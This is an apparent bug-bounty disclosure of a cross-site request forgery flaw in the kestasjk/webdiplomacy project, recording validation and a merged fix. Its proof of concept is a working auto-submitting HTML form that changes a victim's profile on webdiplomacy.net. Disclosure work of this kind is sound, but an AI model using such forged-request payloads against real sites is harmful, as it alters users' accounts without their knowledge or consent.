Cross-Site Request Forgery (CSRF) in kestasjk/webdiplomacy

Valid

Reported on

Jul 23rd 2021


✍️ Description

csrf bug to change user profile

🕵️‍♂️ Proof of Concept

I see there no csrf token checking when updating user-profile save bellow html code in html file and host this file . Now sent this file link to vicitm when victim open the link then his profile information will be changed .

<form action="https://webdiplomacy.net/usercp.php" method="post" id="myForm">
<input type=hidden name="userForm[comment]" value="yyyy">
  <input type="submit" value="Submit">
</form> 
<script>
document.getElementById("myForm").submit()
</script>

💥 Impact

attacker can change vicitm profile information when he open a malicious link

We have contacted a member of the kestasjk/webdiplomacy team and are waiting to hear back 4 months ago
Kestas "Chris" Kuliukas validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kestas "Chris" Kuliukas confirmed that a fix has been merged on e1b873 4 months ago
Kestas "Chris" Kuliukas has been awarded the fix bounty